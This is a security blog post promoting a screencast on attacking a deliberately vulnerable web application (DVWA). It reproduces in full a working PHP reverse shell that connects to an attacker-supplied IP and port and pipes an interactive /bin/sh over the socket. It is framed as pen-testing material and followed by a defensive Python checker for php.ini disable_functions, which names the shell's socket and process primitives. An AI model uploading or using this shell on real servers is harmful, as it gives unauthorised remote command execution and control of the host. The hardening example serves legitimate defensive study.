Screencast: Hacking With Your Web Browser

In this video screencast, Jeremiah Talamantes, Principal Security Consultant and Security Researcher for RedTeam Security, walks us through a step-by-step process of how to compromise a web server using the web applications hosted on it.
One of the main points brought across in the screencast is the need for secure application development. Organizations with some of the most hardened servers and networks are compromised simply through the (insecure) applications they host.
The demonstrations shown in this screencast use Damn Vulnerable Web Application, netcat and other tools. The attacks shown include remote command execution, malicious file uploads, running a PHP reverse shell and dumping the remote MySQL database.
This video is a recommended watch for anyone serious about web application security!
Also included in this post is the PHP reverse shell that is used in the screencast. We hope you find it useful throughout your own internal pen tests.
Video: Web App Insecurity: Going in the Front Door, from RedTeam Security on Vimeo.
PHP Reverse Shell used in this screencast:

```php
<?php
/*
 * ****************************************************************
 * PHP REVERSE SHELL SCRIPT
 * ****************************************************************
 *
 * Description:
 * Upload this PHP script to the web server in order to instantiate
 * a reverse shell on the server to the listening system.
 *
 * Usage:
 * http://www.somedomain.com/revshell.php?ip=192.168.1.100&port=4444
 *
 * Parameters:
 * IP - The IP of the system you would like to direct the shell to
 * PORT - The port the system is listening on
 *
 *
 * Jeremiah Talamantes
 * RedTeam Security
 * http://www.redteamsecure.com
 *
 */
$ip = $_GET['ip'];
$port = $_GET['port'];
if (!filter_var($ip, FILTER_VALIDATE_IP) || !filter_var($port, FILTER_VALIDATE_INT)) {
    echo "Parameters are invalid. Exiting...\n";
    echo "Usage:\n";
    echo "http://www.somedomain.com/revshell.php?ip=192.168.1.100&port=4444";
    exit();
}

/*
 * Setup
 */
set_time_limit(0);
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
chdir("/");
umask(0);

/*
 * Function used to echo output
 */
function printit($string)
{
    global $daemon; // read the script-level flag, not an undefined local
    if (!$daemon) {
        print "$string\n";
    }
}

/*
 * Execute the reverse shell
 */
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

/*
 * Spawn the shell
 */
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell\n\n");
    exit(1);
}

/*
 * Set to non-blocking
 */
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    /*
     * Wait until a command is sent down $sock or
     * some command output is available on STDOUT or STDERR
     */
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    /*
     * If we can read the TCP socket, send
     * data to process' STDIN
     */
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    /*
     * Send data down TCP connection if able
     * to read from the process' STDOUT
     */
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    /*
     * Send data down TCP connection if able
     * to read from STDERR
     */
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

/*
 * Clean up
 */
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
?>
```
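The script above only works because the PHP runtime lets web code call fsockopen() and proc_open(). As an added defensive example (not part of the original post or the RedTeam script), the following Python checker reads a php.ini text and reports which socket and process-spawning built-ins the shell relies on are still callable; the two php.ini fragments are constructed samples, and the function names are real PHP built-ins.

```python
import re

# Built-ins the reverse shell (or a variant of it) needs: one to open the
# outbound connection and one to spawn a child process with pipes.
SHELL_PRIMITIVES = {
    "fsockopen", "pfsockopen", "stream_socket_client",       # outbound TCP
    "proc_open", "popen", "exec", "shell_exec", "system",    # spawn a shell
    "passthru", "pcntl_exec",
}

WEAK_INI = """\
; constructed sample: stock development php.ini
display_errors = On
disable_functions =
allow_url_fopen = On
"""

HARDENED_INI = """\
; constructed sample: production php.ini for a web-only PHP pool
display_errors = Off
disable_functions = proc_open,popen,exec,shell_exec,system,passthru,pcntl_exec,fsockopen,pfsockopen,stream_socket_client
allow_url_fopen = Off
"""


def disabled_functions(ini_text: str) -> set:
    """Return the names switched off by disable_functions.

    Mirrors the php.ini rules that matter here: ';' starts a comment, the
    value is a comma-separated list, and a later assignment of the same
    directive replaces the earlier one instead of adding to it.
    """
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def reachable_primitives(ini_text: str) -> set:
    """Shell-spawning / socket built-ins that web code could still call."""
    return SHELL_PRIMITIVES - disabled_functions(ini_text)


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: still callable -> {sorted(reachable_primitives(ini)) or 'none'}")
```

disable_functions is a PHP_INI_SYSTEM directive, so it only takes effect in php.ini or the php-fpm pool configuration, not via ini_set() or .htaccess; disabling fsockopen and stream_socket_client will also break legitimate outbound clients (mailers, HTTP libraries), so test the application before rolling it out.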